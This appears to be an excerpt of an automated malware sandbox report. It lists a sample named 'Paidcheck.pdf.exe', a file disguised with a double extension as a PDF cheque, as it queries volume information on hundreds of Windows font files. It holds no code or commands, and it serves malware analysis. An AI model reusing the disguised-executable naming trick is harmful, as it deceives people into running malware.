      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
